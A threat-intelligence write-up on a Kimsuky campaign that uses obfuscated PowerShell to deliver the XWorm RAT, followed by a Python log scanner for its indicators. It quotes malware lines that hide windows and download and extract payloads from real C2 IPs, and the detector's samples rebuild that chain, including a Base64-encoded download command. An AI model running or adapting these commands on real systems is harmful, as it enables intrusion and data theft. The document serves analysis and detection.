A sophisticated campaign by the Kimsuky Advanced Persistent Threat (APT) group has been identified, utilizing elaborate PowerShell payloads to deliver the dangerous XWorm Remote Access Trojan (RAT).
This North Korean-linked threat actor has evolved its tactics, leveraging heavily obfuscated PowerShell scripts as the initial infection vector to establish persistent access to victim systems while evading traditional security measures.
The XWorm RAT provides attackers with comprehensive remote control capabilities, including file manipulation, keylogging, screen capturing, and command execution.
By communicating with command and control (C2) servers, the malware receives instructions and exfiltrates sensitive data, making it a powerful addition to Kimsuky’s arsenal.
The use of PowerShell—a legitimate administrative tool—enables the group to bypass many traditional security solutions that primarily focus on executable files.
Shubho57, an early-stage malware analyst and threat researcher, noted the sophisticated nature of this attack after analyzing two PowerShell payloads attributed to Kimsuky and XWorm RAT.
Through meticulous reverse engineering, Shubho57 discovered that both payloads were Base64 encoded and designed to establish Remote Desktop Protocol (RDP) connections to victim systems, bypassing hypervisor security controls.
The impact of this campaign extends beyond immediate data theft, as the RAT provides persistent access that facilitates long-term intelligence gathering.
Organizations handling sensitive geopolitical information face heightened risks from this campaign, which demonstrates Kimsuky’s continued focus on espionage operations.
Analysis reveals a multi-stage attack chain beginning with encoded PowerShell scripts that download and execute additional payloads from C2 servers.
The attack leverages a process tree that includes multiple instances of cmd[.]exe and PowerShell[.]exe, along with legitimate Windows binaries—a technique known as Living-off-the-Land Binaries and Scripts (LOLBAS)—to evade detection.
The infection process begins when victims execute an obfuscated PowerShell script.
This initial script employs sophisticated evasion techniques, including window-hiding functionality implemented through inline C# code.
A crucial component reveals how the malware hides both PowerShell and Windows Terminal windows from the user:
```powershell
# Enumerate the running PowerShell and Windows Terminal processes
$fd = Get-Process -Name powershell,WindowsTerminal
foreach ($fz in $fd) {
    # WinHpXN is the inline C# helper; SwMng(pid, 0) hides the window
    # (likely a ShowWindow wrapper, where 0 corresponds to SW_HIDE)
    [WinHpXN]::SwMng($fz.Id, 0)
}
```
Following successful execution, the script communicates with two primary C2 servers: 185.235.128.114 and 92.119.114.128.
The malware downloads additional components, first retrieving a decoy PDF file to distract the victim while malicious activities continue in the background.
Subsequently, it downloads UnRAR.exe along with password-protected archives containing the core payloads:

```powershell
# Fetch the UnRAR binary and a password-protected archive into %TEMP%
Invoke-WebRequest -Uri "http://185.235.128.114/css/UnRAR.exe" -OutFile "$env:TEMP\UnRAR.exe"
Invoke-WebRequest -Uri "http://185.235.128.114/fonts/eworvolt.rar" -OutFile "$env:TEMP\eworvolt.rar"
# Extract the archive with the embedded password (-p) and overwrite existing files (-o+)
cmd[.]exe /C "$env:TEMP\UnRAR.exe x -ppoiuytrewq1234 -o+ $env:TEMP\eworvolt.rar $env:TEMP"
```
The extracted files—eworvolt.exe and enwtsv.exe—are executed multiple times, likely to ensure persistence and accomplish different malicious objectives.
The final stage involves creating and executing an additional PowerShell script that runs with execution policy bypassed to maintain access.
The campaign employs multiple MITRE ATT&CK techniques, including Command and Scripting Interpreter (PowerShell and Windows Command Shell), Deobfuscate/Decode Files or Information, and Data Encoding for C2 communications.
Security teams are advised to implement robust PowerShell logging and monitoring solutions while updating threat intelligence to include the indicators of compromise associated with this campaign.
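As an added illustration of the logging and monitoring advice above (this is example code written for this page, not the researcher's tooling or anything from the campaign), the following Python script scores PowerShell script-block text for the indicators described in the article: the two C2 addresses, downloads into `$env:TEMP`, password-protected UnRAR extraction, `-ExecutionPolicy Bypass`, the `Get-Process -Name powershell` window-hiding pattern, and Base64 `-EncodedCommand` launches, which it decodes (UTF-16LE) before scanning. The sample events, the `stage2.ps1` file name and the function names are constructed assumptions; in production the input would come from Event ID 4104 records in the `Microsoft-Windows-PowerShell/Operational` log.

```python
import base64
import re

# Constructed sample script-block text, modelled on the chain described in the
# article. These are assumptions for demonstration, not captured log records.
STAGE_CHAIN = "\n".join([
    '$fd = Get-Process -Name powershell,WindowsTerminal',
    'foreach ($fz in $fd) { [WinHpXN]::SwMng($fz.Id, 0) }',
    'Invoke-WebRequest -Uri "http://185.235.128.114/css/UnRAR.exe" -OutFile "$env:TEMP\\UnRAR.exe"',
    'Invoke-WebRequest -Uri "http://185.235.128.114/fonts/eworvolt.rar" -OutFile "$env:TEMP\\eworvolt.rar"',
    'cmd.exe /C "$env:TEMP\\UnRAR.exe x -ppoiuytrewq1234 -o+ $env:TEMP\\eworvolt.rar $env:TEMP"',
    'powershell.exe -ExecutionPolicy Bypass -File "$env:TEMP\\stage2.ps1"',  # stage2.ps1 is an assumed name
])

# A benign administrative block that should not be flagged.
BENIGN = "Get-Service | Where-Object { $_.Status -eq 'Running' } | Export-Csv C:\\reports\\services.csv"

# A constructed Base64-encoded launch (PowerShell encodes -EncodedCommand as UTF-16LE).
ENCODED_INNER = 'Invoke-WebRequest -Uri "http://92.119.114.128/a" -OutFile "$env:TEMP\\a.exe"'
ENCODED_LAUNCH = "powershell.exe -NoProfile -EncodedCommand " + base64.b64encode(
    ENCODED_INNER.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [STAGE_CHAIN, BENIGN, ENCODED_LAUNCH]

# Indicator patterns derived from the behaviour described in the article.
INDICATORS = [
    ("c2_ip", re.compile(r"185\.235\.128\.114|92\.119\.114\.128")),
    ("download_to_temp", re.compile(r"Invoke-WebRequest[^\n]*-OutFile[^\n]*\$env:TEMP", re.I)),
    ("unrar_password_extract", re.compile(r"UnRAR\.exe\s+x\s+-p\S+", re.I)),
    ("execution_policy_bypass", re.compile(r"-ExecutionPolicy\s+Bypass", re.I)),
    ("window_hiding", re.compile(r"Get-Process\s+-Name\s+powershell", re.I)),
    ("encoded_command", re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]+", re.I)),
]

# Only these spellings of the parameter are handled here (assumption: PowerShell
# also accepts other unambiguous prefixes, which a full detector would cover).
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def expand_encoded_commands(text):
    """Append the decoded form of any -EncodedCommand argument so the
    indicator patterns can see through the Base64 layer."""
    expanded = text
    for token in ENCODED_ARG.findall(text):
        try:
            expanded += "\n" + base64.b64decode(token).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; leave the text as-is
    return expanded


def scan_script_block(text):
    """Return the sorted names of every indicator present in one script block."""
    expanded = expand_encoded_commands(text)
    return sorted(name for name, pattern in INDICATORS if pattern.search(expanded))


def triage(events, min_hits=2):
    """Return the indices of script blocks that match at least min_hits indicators.
    Requiring more than one hit keeps a lone Invoke-WebRequest from paging the SOC."""
    return [i for i, text in enumerate(events) if len(scan_script_block(text)) >= min_hits]


if __name__ == "__main__":
    for i, text in enumerate(SAMPLE_EVENTS):
        print(i, scan_script_block(text))
    print("flagged:", triage(SAMPLE_EVENTS))
```

Feeding real data in means replacing `SAMPLE_EVENTS` with the `ScriptBlockText` of 4104 events; the decode step matters because an encoded launch carries none of the plaintext indicators until it is unwrapped.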